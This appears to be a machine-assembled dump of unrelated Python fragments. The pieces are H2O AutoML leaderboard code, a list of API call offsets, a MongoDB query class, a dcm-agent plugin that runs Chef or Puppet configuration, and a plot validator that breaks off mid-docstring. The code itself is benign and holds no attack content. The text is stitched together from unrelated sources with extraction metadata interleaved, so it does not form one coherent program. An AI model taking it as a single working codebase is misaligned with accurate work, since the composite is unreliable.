        :param genmodel_name: Custom name of genmodel jar
        :returns: name of the POJO file written.
        """
        return h2o.download_pojo(self.leader, path, get_jar=get_genmodel_jar, jar_name=genmodel_name)
    def download_mojo(self, path=".", get_genmodel_jar=False, genmodel_name=""):
        """
        Download the leader model in AutoML in MOJO format.
        :param path: the path where MOJO file should be saved.
        :param get_genmodel_jar: if True, then also download h2o-genmodel.jar and store it in folder ``path``.
        :param genmodel_name: Custom name of genmodel jar
        :returns: name of the MOJO file written.
        """
        return ModelBase.download_mojo(self.leader, path, get_genmodel_jar, genmodel_name)
    @property
    def project_name(self):
        """
        Retrieve a string indicating the project_name of the automl instance to retrieve.
        :return: a string containing the project_name
        """
        pass
    @property
    def leader(self):
        """
        Retrieve the top model from an H2OAutoML object
        :return: an H2O model
        :examples:
        >>> # Set up an H2OAutoML object
        >>> aml = H2OAutoML(max_runtime_secs=30)
        >>> # Launch an AutoML run
        >>> aml.train(y=y, training_frame=train)
        >>> # Get the best model in the AutoML Leaderboard
        >>> aml.leader
        >>>
        >>> # Get AutoML object by `project_name`
        >>> get_aml = h2o.automl.get_automl(aml.project_name)
        >>> # Get the best model in the AutoML Leaderboard
        >>> get_aml.leader
        """
        pass
    @property
    def leaderboard(self):
        """
        Retrieve the leaderboard from an H2OAutoML object
        :return: an H2OFrame with model ids in the first column and evaluation metric in the second column sorted
                 by the evaluation metric
        :examples:
        >>> # Set up an H2OAutoML object
        >>> aml = H2OAutoML(max_runtime_secs=30)
        >>> # Launch an AutoML run
        >>> aml.train(y=y, training_frame=train)
        >>> # Get the AutoML Leaderboard
        >>> aml.leaderboard
        >>>
        >>> # Get AutoML object by `project_name`
        >>> get_aml = h2o.automl.get_automl(aml.project_name)
        >>> # Get the AutoML Leaderboard
        >>> get_aml.leaderboard
        """
        pass
    @property
    def training_info(self):
        """
        Expose the name/value columns of `event_log` as a simple dictionary, for example `start_epoch`, `stop_epoch`, ...
        See :func:`event_log` to obtain a description of those key/value pairs.
        :return: a dictionary with event_log['name'] column as keys and event_log['value'] column as values.
        """
        pass
    @property
    def event_log(self):
        """
        Retrieve the backend event log from an H2OAutoML object
        :return: an H2OFrame with detailed events occurred during the AutoML training.
        """
        pass
    def get_leaderboard(self, extra_columns=None):
        """
        Retrieve the leaderboard.
        Contrary to the default leaderboard attached to the instance, this one can return columns other than the metrics.
        :param extra_columns: a string or a list of string specifying which optional columns should be added to the leaderboard. Defaults to None.
            Currently supported extensions are:
            - 'ALL': adds all columns below.
            - 'training_time_ms': column providing the training time of each model in milliseconds (doesn't include the training of cross validation models).
            - 'predict_time_per_row_ms': column providing the average prediction time by the model for a single row.
            - 'algo': column providing the algorithm name for each model.
        :return: An H2OFrame representing the leaderboard.
        :examples:
        >>> aml = H2OAutoML(max_runtime_secs=30)
        >>> aml.train(y=y, training_frame=train)
        >>> lb_all = aml.get_leaderboard('ALL')
        >>> lb_custom = aml.get_leaderboard(['predict_time_per_row_ms', 'training_time_ms'])
        >>> lb_custom_sorted = lb_custom.sort(by='predict_time_per_row_ms')
        """
        assert isinstance(self, Keyed)
        return _fetch_leaderboard(self.key, extra_columns)
    def get_best_model(self, algorithm=None, criterion=None):
        """
        Get best model of a given family/algorithm for a given criterion from an AutoML object.
        :param algorithm: One of "basemodel", "deeplearning", "drf", "gbm", "glm", "stackedensemble", "xgboost".
            If None, pick the best model regardless of the algorithm.
        :param criterion: Criterion can be one of the metrics reported in leaderboard. If set to None, the same ordering
            as in the leaderboard will be used.
            Available criteria:
            - Regression metrics: deviance, rmse, mse, mae, rmsle
            - Binomial metrics: auc, logloss, aucpr, mean_per_class_error, rmse, mse
            - Multinomial metrics: mean_per_class_error, logloss, rmse, mse
            The following additional leaderboard information can be also used as a criterion:
            - 'training_time_ms': column providing the training time of each model in milliseconds (doesn't include the training of cross validation models).
            - 'predict_time_per_row_ms': column providing the average prediction time by the model for a single row.
        :return: An H2OModel or None if no model of a given family is present
        :examples:
        >>> # Set up an H2OAutoML object
        >>> aml = H2OAutoML(max_runtime_secs=30)
        >>> # Launch an AutoML run
        >>> aml.train(y=y, training_frame=train)
        >>> gbm = aml.get_best_model("gbm")
        """
        from h2o.exceptions import H2OValueError
        def _get_models(leaderboard):
            # Leaderboard model ids, in the frame's current row order.
            return [m[0] for m in
                    leaderboard["model_id"].as_data_frame(use_pandas=False, header=False)]
        higher_is_better = ["auc", "aucpr"]
        assert_is_type(algorithm, None, str)
        assert_is_type(criterion, None, str)
        if criterion is not None:
            criterion = criterion.lower()
        if "deviance" == criterion:
            # Leaderboard exposes deviance under this column name.
            criterion = "mean_residual_deviance"
        if algorithm is not None:
            if algorithm.lower() not in ("basemodel", "deeplearning", "drf", "gbm",
                                         "glm", "stackedensemble", "xgboost"):
                raise H2OValueError("Algorithm \"{}\" is not supported!".format(algorithm))
            algorithm = algorithm.lower()
        extra_cols = ["algo"]
        if criterion in ("training_time_ms", "predict_time_per_row_ms"):
            extra_cols.append(criterion)
        leaderboard = h2o.automl.get_leaderboard(self, extra_columns=extra_cols)
        # "basemodel" means any non-ensemble model; other values filter on the algo column.
        leaderboard = leaderboard if algorithm is None else (
            leaderboard[leaderboard["algo"].tolower() == algorithm, :] if algorithm != "basemodel"
            else leaderboard[leaderboard["algo"].tolower() != "stackedensemble", :])
        if leaderboard.nrow == 0:
            return None
        if criterion is None:
            # No criterion: leaderboard order is already the ranking.
            return h2o.get_model(leaderboard[0, "model_id"])
        if criterion not in leaderboard.columns:
            raise H2OValueError("Criterion \"{}\" is not present in the leaderboard!".format(criterion))
        models_in_default_order = _get_models(leaderboard)
        sorted_lb = leaderboard.sort(by=criterion, ascending=criterion not in higher_is_better)
        # Ties on the criterion are broken by the original leaderboard order.
        selected_models = _get_models(sorted_lb[sorted_lb[criterion] == sorted_lb[0, criterion]])
        picked_model = [model for model in models_in_default_order if model in selected_models][0]
        return h2o.get_model(picked_model)
def _fetch_leaderboard(aml_id, extensions=None):
    """Fetch the leaderboard for an AutoML id, with optional extra columns."""
    assert_is_type(extensions, None, str, [str])
    # Normalize extensions to a list of column names.
    if extensions is None:
        extensions = []
    elif is_type(extensions, str):
        extensions = [extensions]
    resp = h2o.api("GET /99/Leaderboards/%s" % aml_id, data=dict(extensions=extensions))
    frame_key = resp['project_name'].split('@', 1)[0]+"_custom_leaderboard"
    return _fetch_table(resp['table'], key=frame_key, progress_bar=False)
def _fetch_table(table, key=None, progress_bar=True):
    """Convert an H2OTwoDimTable into an H2OFrame stored under `key`.

    Temporarily overrides the global progress-bar flag (multiple progress bars
    confuse users); the original setting is always restored on exit.
    """
    saved_progress_state = H2OJob.__PROGRESS_BAR__
    try:
        H2OJob.__PROGRESS_BAR__ = progress_bar
        frame = h2o.H2OFrame(table.cell_values, destination_frame=key, column_names=table.col_header, column_types=table.col_types)
        # Drop the index column and reassign the id to ensure persistence on the backend.
        return h2o.assign(frame[1:], key)
    finally:
        H2OJob.__PROGRESS_BAR__ = saved_progress_state
def _fetch_state(aml_id, properties=None, verbosity=None):
    """Fetch an AutoML run's backend state, optionally restricted to `properties`."""
    state_json = h2o.api("GET /99/AutoML/%s" % aml_id, data=dict(verbosity=verbosity))
    project_name = state_json["project_name"]
    if project_name is None:
        raise H2OValueError("No AutoML instance with id {}.".format(aml_id))
    def wanted(prop):
        # No filter means fetch everything.
        return properties is None or prop in properties
    model_ids = [key["name"] for key in state_json['leaderboard']['models']]
    leader_id = model_ids[0] if model_ids else None
    leader = None
    if wanted('leader') and leader_id is not None:
        leader = h2o.get_model(leader_id)
    leaderboard = None
    if wanted('leaderboard'):
        leaderboard = _fetch_table(state_json['leaderboard_table'], key=project_name+"_leaderboard", progress_bar=False)
    event_log = None
    if wanted('event_log'):
        event_log = _fetch_table(state_json['event_log_table'], key=project_name+"_eventlog", progress_bar=False)
    return dict(
        project_name=project_name,
        json=state_json,
        leader_id=leader_id,
        leader=leader,
        leaderboard=leaderboard,
        event_log=event_log,
    )
| [
"h2o.get_model",
"h2o.model.ModelBase.download_mojo",
"h2o.utils.typechecks.is_type",
"h2o.download_pojo",
"h2o.utils.typechecks.assert_is_type",
"h2o.H2OFrame",
"h2o.assign",
"h2o.automl.get_leaderboard"
] | [((9792, 9836), 'h2o.utils.typechecks.assert_is_type', 'assert_is_type', (['extensions', 'None', 'str', '[str]'], {}), '(extensions, None, str, [str])\n', (9806, 9836), False, 'from h2o.utils.typechecks import assert_is_type, is_type\n'), ((1841, 1932), 'h2o.download_pojo', 'h2o.download_pojo', (['self.leader', 'path'], {'get_jar': 'get_genmodel_jar', 'jar_name': 'genmodel_name'}), '(self.leader, path, get_jar=get_genmodel_jar, jar_name=\n genmodel_name)\n', (1858, 1932), False, 'import h2o\n'), ((2391, 2466), 'h2o.model.ModelBase.download_mojo', 'ModelBase.download_mojo', (['self.leader', 'path', 'get_genmodel_jar', 'genmodel_name'], {}), '(self.leader, path, get_genmodel_jar, genmodel_name)\n', (2414, 2466), False, 'from h2o.model import ModelBase\n'), ((7976, 8012), 'h2o.utils.typechecks.assert_is_type', 'assert_is_type', (['algorithm', 'None', 'str'], {}), '(algorithm, None, str)\n', (7990, 8012), False, 'from h2o.utils.typechecks import assert_is_type, is_type\n'), ((8021, 8057), 'h2o.utils.typechecks.assert_is_type', 'assert_is_type', (['criterion', 'None', 'str'], {}), '(criterion, None, str)\n', (8035, 8057), False, 'from h2o.utils.typechecks import assert_is_type, is_type\n'), ((8721, 8779), 'h2o.automl.get_leaderboard', 'h2o.automl.get_leaderboard', (['self'], {'extra_columns': 'extra_cols'}), '(self, extra_columns=extra_cols)\n', (8747, 8779), False, 'import h2o\n'), ((9701, 9728), 'h2o.get_model', 'h2o.get_model', (['picked_model'], {}), '(picked_model)\n', (9714, 9728), False, 'import h2o\n'), ((10675, 10795), 'h2o.H2OFrame', 'h2o.H2OFrame', (['table.cell_values'], {'destination_frame': 'key', 'column_names': 'table.col_header', 'column_types': 'table.col_types'}), '(table.cell_values, destination_frame=key, column_names=table.\n col_header, column_types=table.col_types)\n', (10687, 10795), False, 'import h2o\n'), ((10806, 10829), 'h2o.assign', 'h2o.assign', (['fr[1:]', 'key'], {}), '(fr[1:], key)\n', (10816, 10829), False, 'import h2o\n'), ((9135, 
9176), 'h2o.get_model', 'h2o.get_model', (["leaderboard[0, 'model_id']"], {}), "(leaderboard[0, 'model_id'])\n", (9148, 9176), False, 'import h2o\n'), ((9919, 9943), 'h2o.utils.typechecks.is_type', 'is_type', (['extensions', 'str'], {}), '(extensions, str)\n', (9926, 9943), False, 'from h2o.utils.typechecks import assert_is_type, is_type\n'), ((11598, 11622), 'h2o.get_model', 'h2o.get_model', (['leader_id'], {}), '(leader_id)\n', (11611, 11622), False, 'import h2o\n')] |
# coding: utf-8
from pymongo import MongoClient
import conf
class MongoQuery(object):
    """Thin query layer over the geokb MongoDB database.

    A "grounded" query is a dict with 'from' (collection name), 'where'
    (Mongo filter) and 'select' (field list, or containing '*' for all).
    """

    def __init__(self):
        self._conn = MongoClient(conf.mongodb_conn_str)
        self._db = self._conn.geokb

    def query(self, grounded, limit=15, sort_keys=None):
        """Run a grounded query and return projected documents.

        :param grounded: dict with 'from'/'where'/'select' keys
        :param limit: maximum number of documents returned
        :param sort_keys: optional list of tuples whose first element is a
                          rank name; each adds a descending sort on
                          '_sys_ranks.<rank_name>'
        """
        col = self._db[grounded['from']]
        # BUG FIX: the rank sort entries were bare strings, not
        # (key, direction) pairs as pymongo requires (and as coarse_query
        # already does); also guard against sort_keys=None.
        rank_sort = [('_sys_ranks.%s' % x[0], -1)
                     for x in (sort_keys or []) if x is not None]
        docs = col.find(grounded['where'],
                        limit=limit,
                        sort=[('popularity', -1)] + rank_sort)
        if '*' in grounded['select']:
            res = [dict((k, v) for k, v in doc.items() if k != '_id') for doc in docs]
        else:
            res = []
            for doc in docs:
                selected = {}
                for k in grounded['select']:
                    if k in doc:
                        selected[k] = doc[k]
                res.append(selected)
        return res

    def coarse_query(self, grounded, limit=2000, sort_keys=None):
        """Run a grounded query without projection, returning full documents
        (minus '_id'), sorted by popularity then requested system ranks."""
        col = self._db[grounded['from']]
        docs = col.find(grounded['where'],
                        limit=limit,
                        sort=([('popularity', -1)]
                              + [('_sys_ranks.%s' % x[0], -1)
                                 for x in (sort_keys or []) if x is not None]))
        return [dict((k, v) for k, v in doc.items() if k != '_id') for doc in docs]

    def project(self, docs, grounded, limit=15):
        """Project already-fetched docs, dropping results whose TimeRanker
        rerank score is below 1 and adding 'src'/'score' fields for the
        downstream blender.

        :param limit: maximum number of documents returned (BUG FIX: this was
                      previously hard-coded to 15, ignoring the parameter).
        """
        res = []
        for doc in docs:
            if len(res) >= limit:
                break
            try:
                score = doc['_rerank']['TimeRanker']
                if score < 1:
                    continue
            except KeyError:
                # No rerank info: keep the document.
                pass
            if '*' in grounded['select']:
                doc = dict((k, v) if type(v) is not list else (k, self._merge_obj_array(v))
                           for k, v in doc.items() if k != '_id')
                doc['src'] = 'geokb'
                doc['score'] = 2.0  # fixed high score for nginx blender, in another module
                res.append(doc)
            else:
                selected = {}
                for k in grounded['select']:
                    if type(doc[k]) is list:
                        selected[k] = self._merge_obj_array(doc[k])
                    else:
                        selected[k] = doc[k]
                selected['_sys_ranks'] = doc['_sys_ranks']
                selected['src'] = 'geokb'
                selected['score'] = 2.0  # fixed high score for nginx blender, in another module
                res.append(selected)
        return res

    @staticmethod
    def _merge_obj_array(arr):
        """Flatten a list of dicts into a flat list of their values,
        e.g. [{u'dish': u'AA'}, {u'dish': u'BB'}] -> [u'AA', u'BB'].
        Non-list input or a list whose first element is not a dict is
        returned unchanged."""
        if len(arr) == 0 or type(arr) is not list:
            return arr
        if type(arr[0]) is not dict:
            return arr
        lst = []
        for obj in arr:
            lst += [v for _, v in obj.items()]
        return lst
| [
"pymongo.MongoClient"
] | [((133, 167), 'pymongo.MongoClient', 'MongoClient', (['conf.mongodb_conn_str'], {}), '(conf.mongodb_conn_str)\n', (144, 167), False, 'from pymongo import MongoClient\n')] |
#
# Copyright (C) 2014 Dell, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import configparser
import json
import logging
import os
import urllib.parse
import dcm.agent.exceptions as exceptions
import dcm.agent.logger as dcm_logger
import dcm.agent.plugins.api.base as plugin_base
import dcm.agent.plugins.api.exceptions as plugin_exceptions
import dcm.agent.plugins.api.utils as plugin_utils
import dcm.agent.utils as utils
# Module-level logger for this plugin.
_g_logger = logging.getLogger(__name__)
class ConfigureServer(plugin_base.Plugin):
    """Agent plugin that bootstraps configuration management (Chef or Puppet)
    on a server, driven by the protocol arguments below."""

    protocol_arguments = {
        "configType":
            ("Which configuration management software to use (chef or puppet)",
             True, str, None),
        "authId":
            ("", False, str, None),
        "configurationData":
            ("", False, plugin_utils.base64type_convertor, None),
        "encryptedConfigToken":
            ("", False, plugin_utils.base64type_convertor, None),
        "encryptedAuthSecret":
            ("", False, plugin_utils.base64type_convertor, None),
        "endpoint":
            ("", False, str, None),
        "providerRegionId":
            ("", False, str, None),
        "runAsUser":
            ("", False, str, None),
        "storageDelegate":
            ("", False, str, None),
        "storageEndpoint":
            ("", False, str, None),
        "storageAccount":
            ("", False, str, None),
        "scriptFiles":
            ("", False, list, None),
        "storagePublicKey":
            ("", False, plugin_utils.base64type_convertor, None),
        "storagePrivateKey":
            ("", False, plugin_utils.base64type_convertor, None),
        "environmentId":
            ("", False, str, None),
        "personalityFiles":
            ("", False, list, None),
        "configClientName":
            ("", False, str, None),
        "configCert":
            ("", False, plugin_utils.base64type_convertor, None),
        "configKey":
            ("", False, plugin_utils.base64type_convertor, None),
        "runListIds":
            ("", False, list, None),
        "parameterList":
            ("", False, plugin_utils.base64type_convertor, None),
    }

    def __init__(self, conf, job_id, items_map, name, arguments):
        super(ConfigureServer, self).__init__(
            conf, job_id, items_map, name, arguments)
        # Fall back to the agent's system user when no runAsUser was supplied.
        if not self.args.runAsUser:
            self.args.runAsUser = self.conf.system_user

    def configure_server_with_chef(self):
        """Write the Chef run list and auth token to temp files and invoke the
        runConfigurationManagement-CHEF script.

        :return: (stdout, stderr, return_code) from the script.
        """
        chef_dir = self.conf.get_temp_file("chefconf", isdir=True)
        run_list_file_name = os.path.join(chef_dir, "runList.cfg")
        token_file_path = self.conf.get_temp_file("token.pem")
        try:
            if self.args.encryptedAuthSecret:
                token = self.args.encryptedAuthSecret
            else:
                token = "NULL"
            # The shell script expects the literal string "NULL" for unset values.
            authId = self.args.authId
            if authId is None:
                authId = "NULL"
            endpoint = self.args.endpoint
            if endpoint is None:
                endpoint = "NULL"
            environmentId = self.args.environmentId
            if environmentId is None:
                environmentId = "NULL"
            chef_json = {"run_list": self.args.runListIds}
            with open(run_list_file_name, "w") as fptr:
                fptr.write(json.dumps(chef_json))
            with open(token_file_path, "w") as fptr:
                fptr.write(token)
                fptr.write(os.linesep)
            exe = self.conf.get_script_location(
                "runConfigurationManagement-CHEF")
            cmd_list = [exe,
                        self.args.runAsUser,
                        self.args.configClientName,
                        token_file_path,
                        run_list_file_name,
                        authId,
                        endpoint,
                        environmentId,
                        self.conf.configuration_management_chef_client_version]
            return plugin_utils.run_command(self.conf, cmd_list)
        finally:
            plugin_utils.safe_delete(run_list_file_name)
            plugin_utils.safe_delete(token_file_path)

    def _edit_puppet_conf(self, template_path, new_location, endpoint):
        """Render the puppet.conf template with this node's certname and master."""
        # BUG FIX: configparser.SafeConfigParser is a deprecated alias removed
        # in Python 3.12; ConfigParser has been the equivalent class since 3.2.
        parser = configparser.ConfigParser()
        parser.read(template_path)
        if not parser.has_section("agent"):
            parser.add_section("agent")
        parser.set("agent", "certname", self.args.configClientName)
        parser.set("agent", "server", endpoint)
        with open(new_location, "w") as fptr:
            parser.write(fptr)

    def configure_server_with_puppet(self):
        """Install the puppet extras package, render puppet.conf and invoke the
        runConfigurationManagement-PUPPET script.

        :return: (stdout, stderr, return_code) from the script.
        :raises AgentOptionValueNotSetException: when no endpoint was given.
        :raises AgentExtrasNotInstalledException: when the extras package is
                missing or incomplete.
        """
        if self.args.endpoint is None:
            raise exceptions.AgentOptionValueNotSetException("endpoint")
        # XXX it will only work with the default port.  There is no way for
        # the user to configure anything else in the console
        endpoint = urllib.parse.urlparse(self.args.endpoint).hostname
        puppet_extras_base_path = os.path.join(self.conf.extra_base_path,
                                               "puppetconf")
        puppet_extras_bin = os.path.join(self.conf.extra_base_path,
                                          "bin/puppet")
        try:
            utils.install_extras(
                self.conf, package=self.conf.extra_package_name)
        except exceptions.AgentExtrasNotInstalledException as ex:
            _g_logger.exception("An error occurred trying to install puppet.  "
                                "Exception message is %s" % str(ex))
            raise
        template_puppet_conf_path = os.path.join(puppet_extras_base_path,
                                                 "puppet.conf.template")
        if not os.path.exists(template_puppet_conf_path):
            raise exceptions.AgentExtrasNotInstalledException(
                "The puppet.conf template did not install properly.")
        if not os.path.exists(puppet_extras_bin):
            raise exceptions.AgentExtrasNotInstalledException(
                "The puppet binary did not install properly.")
        puppet_conf_path = self.conf.get_temp_file("puppet.conf")
        self._edit_puppet_conf(template_puppet_conf_path,
                               puppet_conf_path,
                               endpoint)
        cert_file_path = self.conf.get_temp_file("cert.pem")
        key_file_path = self.conf.get_temp_file("key.pem")
        try:
            with open(cert_file_path, "w") as fptr:
                fptr.write(self.args.configCert)
            with open(key_file_path, "w") as fptr:
                fptr.write(self.args.configKey)
            exe = self.conf.get_script_location(
                "runConfigurationManagement-PUPPET")
            cmd = [exe,
                   endpoint,
                   cert_file_path,
                   key_file_path,
                   self.args.configClientName,
                   self.conf.extra_base_path,
                   puppet_conf_path]
            return plugin_utils.run_command(self.conf, cmd)
        finally:
            plugin_utils.safe_delete(cert_file_path)
            plugin_utils.safe_delete(key_file_path)
            plugin_utils.safe_delete(puppet_conf_path)

    def run(self):
        """Dispatch to the configured CM tool and wrap its output in a PluginReply."""
        _g_logger.info("Running configuration management of type " +
                       self.args.configType)
        if self.args.configType.upper() == "CHEF":
            (stdout, stderr, rc) = self.configure_server_with_chef()
        elif self.args.configType.upper() == "PUPPET":
            (stdout, stderr, rc) = self.configure_server_with_puppet()
        else:
            raise plugin_exceptions.AgentPluginParameterBadValueException(
                "configType", "CHEF or PUPPET")
        # Mirror the tool's output to the DCM console for visibility.
        if stderr:
            dcm_logger.log_to_dcm_console_configuration_management_error(
                stderr=stderr)
        if stdout:
            dcm_logger.log_to_dcm_console_configuration_management_output(
                stdout=stdout)
        if rc != 0:
            return plugin_base.PluginReply(rc, message=stderr)
        else:
            return plugin_base.PluginReply(
                rc, reply_type="string", reply_object=stdout)
def load_plugin(conf, job_id, items_map, name, arguments):
    # Plugin entry point expected by the dcm-agent plugin loader: build the
    # ConfigureServer plugin instance for the given job.
    return ConfigureServer(conf, job_id, items_map, name, arguments)
| [
"logging.getLogger",
"os.path.exists",
"dcm.agent.logger.log_to_dcm_console_configuration_management_error",
"dcm.agent.plugins.api.exceptions.AgentPluginParameterBadValueException",
"dcm.agent.logger.log_to_dcm_console_configuration_management_output",
"dcm.agent.plugins.api.base.PluginReply",
"json.du... | [((948, 975), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (965, 975), False, 'import logging\n'), ((3059, 3096), 'os.path.join', 'os.path.join', (['chef_dir', '"""runList.cfg"""'], {}), "(chef_dir, 'runList.cfg')\n", (3071, 3096), False, 'import os\n'), ((4736, 4767), 'configparser.SafeConfigParser', 'configparser.SafeConfigParser', ([], {}), '()\n', (4765, 4767), False, 'import configparser\n'), ((5481, 5534), 'os.path.join', 'os.path.join', (['self.conf.extra_base_path', '"""puppetconf"""'], {}), "(self.conf.extra_base_path, 'puppetconf')\n", (5493, 5534), False, 'import os\n'), ((5610, 5663), 'os.path.join', 'os.path.join', (['self.conf.extra_base_path', '"""bin/puppet"""'], {}), "(self.conf.extra_base_path, 'bin/puppet')\n", (5622, 5663), False, 'import os\n'), ((6088, 6149), 'os.path.join', 'os.path.join', (['puppet_extras_base_path', '"""puppet.conf.template"""'], {}), "(puppet_extras_base_path, 'puppet.conf.template')\n", (6100, 6149), False, 'import os\n'), ((4472, 4517), 'dcm.agent.plugins.api.utils.run_command', 'plugin_utils.run_command', (['self.conf', 'cmd_list'], {}), '(self.conf, cmd_list)\n', (4496, 4517), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((4547, 4591), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['run_list_file_name'], {}), '(run_list_file_name)\n', (4571, 4591), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((4604, 4645), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['token_file_path'], {}), '(token_file_path)\n', (4628, 4645), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((5183, 5237), 'dcm.agent.exceptions.AgentOptionValueNotSetException', 'exceptions.AgentOptionValueNotSetException', (['"""endpoint"""'], {}), "('endpoint')\n", (5225, 5237), True, 'import dcm.agent.exceptions as exceptions\n'), ((5731, 5800), 'dcm.agent.utils.install_extras', 'utils.install_extras', 
(['self.conf'], {'package': 'self.conf.extra_package_name'}), '(self.conf, package=self.conf.extra_package_name)\n', (5751, 5800), True, 'import dcm.agent.utils as utils\n'), ((6214, 6255), 'os.path.exists', 'os.path.exists', (['template_puppet_conf_path'], {}), '(template_puppet_conf_path)\n', (6228, 6255), False, 'import os\n'), ((6275, 6377), 'dcm.agent.exceptions.AgentExtrasNotInstalledException', 'exceptions.AgentExtrasNotInstalledException', (['"""The puppet.conf template did not install properly."""'], {}), "(\n 'The puppet.conf template did not install properly.')\n", (6318, 6377), True, 'import dcm.agent.exceptions as exceptions\n'), ((6405, 6438), 'os.path.exists', 'os.path.exists', (['puppet_extras_bin'], {}), '(puppet_extras_bin)\n', (6419, 6438), False, 'import os\n'), ((6458, 6553), 'dcm.agent.exceptions.AgentExtrasNotInstalledException', 'exceptions.AgentExtrasNotInstalledException', (['"""The puppet binary did not install properly."""'], {}), "(\n 'The puppet binary did not install properly.')\n", (6501, 6553), True, 'import dcm.agent.exceptions as exceptions\n'), ((7489, 7529), 'dcm.agent.plugins.api.utils.run_command', 'plugin_utils.run_command', (['self.conf', 'cmd'], {}), '(self.conf, cmd)\n', (7513, 7529), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((7559, 7599), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['cert_file_path'], {}), '(cert_file_path)\n', (7583, 7599), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((7612, 7651), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['key_file_path'], {}), '(key_file_path)\n', (7636, 7651), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((7664, 7706), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['puppet_conf_path'], {}), '(puppet_conf_path)\n', (7688, 7706), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((8257, 8332), 
'dcm.agent.logger.log_to_dcm_console_configuration_management_error', 'dcm_logger.log_to_dcm_console_configuration_management_error', ([], {'stderr': 'stderr'}), '(stderr=stderr)\n', (8317, 8332), True, 'import dcm.agent.logger as dcm_logger\n'), ((8381, 8457), 'dcm.agent.logger.log_to_dcm_console_configuration_management_output', 'dcm_logger.log_to_dcm_console_configuration_management_output', ([], {'stdout': 'stdout'}), '(stdout=stdout)\n', (8442, 8457), True, 'import dcm.agent.logger as dcm_logger\n'), ((8515, 8558), 'dcm.agent.plugins.api.base.PluginReply', 'plugin_base.PluginReply', (['rc'], {'message': 'stderr'}), '(rc, message=stderr)\n', (8538, 8558), True, 'import dcm.agent.plugins.api.base as plugin_base\n'), ((8592, 8661), 'dcm.agent.plugins.api.base.PluginReply', 'plugin_base.PluginReply', (['rc'], {'reply_type': '"""string"""', 'reply_object': 'stdout'}), "(rc, reply_type='string', reply_object=stdout)\n", (8615, 8661), True, 'import dcm.agent.plugins.api.base as plugin_base\n'), ((8120, 8211), 'dcm.agent.plugins.api.exceptions.AgentPluginParameterBadValueException', 'plugin_exceptions.AgentPluginParameterBadValueException', (['"""configType"""', '"""CHEF or PUPPET"""'], {}), "('configType',\n 'CHEF or PUPPET')\n", (8175, 8211), True, 'import dcm.agent.plugins.api.exceptions as plugin_exceptions\n'), ((3806, 3827), 'json.dumps', 'json.dumps', (['chef_json'], {}), '(chef_json)\n', (3816, 3827), False, 'import json\n')] |
from toolz import get
# Each validator is a (plot_types, predicate, message) triple.  The predicate
# returns True when the plot specifier is INVALID for any plot type in
# plot_types; validate_plot runs every applicable validator and collects the
# messages.  Because every validator runs even after an earlier one fails,
# predicates must not assume optional keys ("x", "y", "axis", ...) exist —
# defaulted lookups are used below instead of direct indexing, which
# previously raised KeyError for an XY plot missing an axis.
PLOT_VALIDATORS = [
    (
        {"line", "scatter", "bar"},
        lambda x: ("x" not in x) or ("y" not in x),
        "XY plot does not have X and Y.",
    ),
    (
        {"histogram"},
        lambda x: ("step" in x) and ("bins" in x),
        "Histogram cannot have STEP and BINS.",
    ),
    (
        {"line", "scatter", "bar"},
        # .get guards a missing axis, already reported by the first validator.
        lambda x: ("agg" in x.get("x", {})) and ("agg" in x.get("y", {})),
        "XY plot cannot have an aggregation on X and Y.",
    ),
    (
        {"histogram", "pie"},
        lambda x: ("agg" in x.get("x", {}))
        or ("agg" in x.get("y", {}))
        or ("agg" in x.get("axis", {})),
        "Histograms and pie charts cannot have aggregations.",
    ),
    (
        {"histogram", "pie"},
        lambda x: ("temporal" in x.get("x", {}))
        or ("temporal" in x.get("y", {}))
        or ("temporal" in x.get("axis", {})),
        "Histograms and pie charts cannot have temporal axes.",
    ),
    (
        {"histogram"},
        lambda x: ("x" in x) and ("y" in x),
        "Histograms can have X or Y, not both.",
    ),
    (
        {"histogram"},
        lambda x: ("x" not in x) and ("y" not in x),
        "Histograms must have an X or Y.",
    ),
    ({"pie"}, lambda x: "axis" not in x, "Pie charts must have an axis."),
    (
        {"line", "bar"},  # SORT is a no-op for scatter.
        # .get guards a missing axis, already reported by the first validator.
        lambda x: ("sort" in x.get("x", {})) and ("sort" in x.get("y", {})),
        "Cannot sort by two axes.",
    ),
    (
        {"pie"},
        lambda x: (x.get("hole", 0.0) < 0) or (x.get("hole", 0.0) > 1),
        "HOLE must be between zero and one.",
    ),
    (
        {"histogram"},
        lambda x: x.get("step", 1) <= 0,
        "STEP must be greater than zero.",
    ),
    (
        {"histogram"},
        lambda x: x.get("bins", 1) <= 0,
        "BINS must be greater than zero.",
    ),
    (
        {"histogram", "pie"},
        lambda x: "color_by" in x,
        "Histograms and pie charts cannot have COLOR BY.",
    ),
    ({"pie"}, lambda x: "split_by" in x, "Pie charts cannot have SPLIT BY."),
    (
        {"line", "scatter", "bar"},
        lambda x: ("split_by" in x) and ("color_by" in x),
        "Cannot have COLOR BY and SPLIT BY on same plot.",
    ),
    (
        {"line", "scatter", "bar"},
        lambda x: (
            # If we don't include this it can throw exceptions for other
            # validators.
            ("x" in x)
            and ("y" in x)
        )
        and (("agg" in x["x"]) or ("agg" in x["y"]))
        and (("color_by" in x) and ("agg" not in x["color_by"])),
        "If there's an aggregation on X or Y, COLOR BY must also aggregate.",
    ),
]
def validate_plot(svl_plot):
    """Validate an SVL plot specifier.

    Parameters
    ----------
    svl_plot : dict
        The SVL plot specifier.

    Returns
    -------
